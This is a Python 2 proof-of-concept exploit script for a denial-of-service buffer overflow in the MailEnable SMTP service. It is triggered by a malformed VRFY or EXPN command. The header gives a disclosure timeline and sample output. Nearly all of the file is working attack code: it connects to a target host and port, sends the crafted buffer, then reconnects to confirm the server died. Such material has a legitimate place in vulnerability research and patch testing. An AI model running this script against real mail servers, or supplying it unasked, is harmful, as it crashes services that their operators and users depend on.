#!/usr/bin/python ########################################################################## # # MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS ) # Bug discovered by Matteo Memelli aka ryujin # http://www.gray-world.net http://www.be4mind.com # # Affected Versions : Standard Edition all versions # Professional Edition all versions # Enterprise Edition all versions # Tested on OS : Windows 2000 SP4 English # Windows 2003 Standard Edition Italian # Windows XP SP2 English # Discovery Date : 02/24/2008 # Initial vendor notification : 03/06/2008 # Coordinated public disclosure: 03/11/2008 # # CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!! # #------------------------------------------------------------------------- # # THX TO muts at offensive-security.com : # I'll promise you: next time i'll find an easier one and get my shell :P # #------------------------------------------------------------------------- ########################################################################## # # matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY # [+] Connecting to 192.168.1.245 on port 25 # 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \ # 03/06/08 13:20:49 # # [+] Sending evilbuffer... # [+] Waiting 10 secs before reconnecting... # [+] Reconnecting... # [+] SMTP Server died! # [+] Connection refused # ########################################################################## from socket import * from optparse import OptionParser import sys, time usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]" parser = OptionParser(usage=usage) parser.add_option("-H", "--target_host", type="string", action="store", dest="HOST", help="Target Host") parser.add_option("-P", "--target_port", type="int", action="store", dest="PORT", help="Target Port") parser.add_option("-c", "--command", type="string", action="store", dest="COMMAND", help="Command: VRFY or EXPN ; defualt VRFY") (options, args) = parser.parse_args() HOST = options.HOST PORT = options.PORT COMMAND = options.COMMAND if not (HOST and PORT): parser.print_help() sys.exit() if not COMMAND: COMMAND = 'VRFY' print "[+] Using default command VRFY" else: COMMAND = COMMAND.upper().strip() if COMMAND != 'VRFY' and COMMAND != 'EXPN': print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND sys.exit() evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) print "[+] Connecting to %s on port %d" % (HOST, PORT) print s.recv(1024) print "[+] Sending evilbuffer..." s.send(evilbuf) s.close() print "[+] Waiting 10 secs before reconnecting..." time.sleep(10) try: s = socket(AF_INET, SOCK_STREAM) print "[+] Reconnecting..." s.connect((HOST, PORT)) except error, e: print "[+] SMTP Server died!" print "[+] %s" % e[1] else: print "[-] SMTP Server is still up" print "[-] This probably means that is not vulnerable" s.close()